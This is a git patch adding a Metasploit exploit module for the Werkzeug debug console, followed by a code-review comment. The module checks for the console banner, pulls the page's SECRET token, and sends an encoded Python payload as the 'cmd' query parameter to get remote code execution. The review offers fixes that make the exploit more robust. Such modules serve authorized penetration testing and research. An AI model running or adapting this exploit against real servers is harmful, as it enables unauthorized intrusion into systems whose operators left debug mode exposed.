From bff92f2304cc466bf79d429b7cc45cc354b56429 Mon Sep 17 00:00:00 2001 From: h00die Date: Fri, 10 Jul 2015 21:13:12 -0400 Subject: [PATCH] Initial add --- .../exploits/multi/http/werkzeug_debug_rce.rb | 79 +++++++++++++++++++ 1 file changed, 79 insertions(+)
diff --git a/modules/exploits/multi/http/werkzeug_debug_rce.rb b/modules/exploits/multi/http/werkzeug_debug_rce.rb
index e69de29bb2..3a9433fcf7
--- a/modules/exploits/multi/http/werkzeug_debug_rce.rb
+++ b/modules/exploits/multi/http/werkzeug_debug_rce.rb
@@ -0,0 +1,79 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'rex'
+
+class Metasploit4 < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize
+ super(
+ 'Name' => 'Werkzeug Debug Shell Command Execution',
+ 'Description' => %q{
+ This module will exploit the Werkzeug debug console to put down a
+ python shell. This debugger "must never be used on production
+ machines", but sometimes slips passed testing.
+ Tested against:
+ 0.9.6 on Debian
+ 0.10 on CentOS
+ },
+ 'Author' => 'h00die ',
+ 'References' =>
+ [
+ [ 'Website', 'http://werkzeug.pocoo.org/docs/0.10/debug/#enabling-the-debugger']
+ ],
+ 'License' => MSF_LICENSE,
+ 'Platform' => ['python'],
+ 'Targets' => [[ 'werkzeug 0.10 and older', { }]],
+ 'Arch' => ARCH_PYTHON,
+ 'DefaultTarget' => 0,
+ 'DisclosureDate' => 'Jun 28 2015',
+ )
+ register_options(
+ [
+ OptString.new('URI',[true,'URI to the console','/console'])
+ ], self.class
+ )
+ end
+
+ def check
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => normalize_uri(datastore['URI'])
+ })
+ #https://github.com/mitsuhiko/werkzeug/blob/master/werkzeug/debug/tbtools.py#L67
+ if (res and res.body =~ /Brought to you by DON'T PANIC<\/strong>, your\n friendly Werkzeug powered traceback interpreter./)
+ return Exploit::CheckCode::Vulnerable
+ end
+ return Exploit::CheckCode::Safe
+ end
+
+ def exploit
+ #first we need to get the SECRET code
+ secret = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => normalize_uri(datastore['URI'])
+ })
+ if (secret and secret.body =~ /SECRET = "([a-zA-Z0-9]{20})";/)
+ secret = secret.body.match(/SECRET = "([a-zA-Z0-9]{20})";/).captures[0]
+ vprint_status("Secret Code: #{secret}")
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => normalize_uri(datastore['URI']),
+ 'vars_get' => {
+ '__debugger__' => 'yes',
+ 'cmd' => payload.encoded,
+ 'frm' => '0',
+ 's' => secret
+ }
+ })
+ else
+ print_error("Secret code not detected.")
+ end
+ end
+end
+
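Review bot: In `check`, a nil response from `send_request_cgi` (connection refused, timeout) falls through to `return Exploit::CheckCode::Safe`, so an unreachable host is reported as not vulnerable; and in `exploit` the result of the command request is assigned to `res` but never inspected, so a non-200 reply or a failed request goes unreported. I would add `return Exploit::CheckCode::Unknown unless res` before the banner match in `check`, and in `exploit` replace the `print_error` branch with `fail_with(Failure::NotFound, 'Secret code not detected.')` so the framework records the failure rather than a bare message; either drop the unused `res =` or check `res && res.code == 200` after the request. Worth a comment near the second request: `payload.encoded` is delivered as the `cmd` query parameter of a GET, so the full Python payload will appear in the target's access log and any intermediate proxy logs. Minor style: the `and` in both `if` conditions should be `&&`, and "slips passed testing" in the description reads better as "slips past testing".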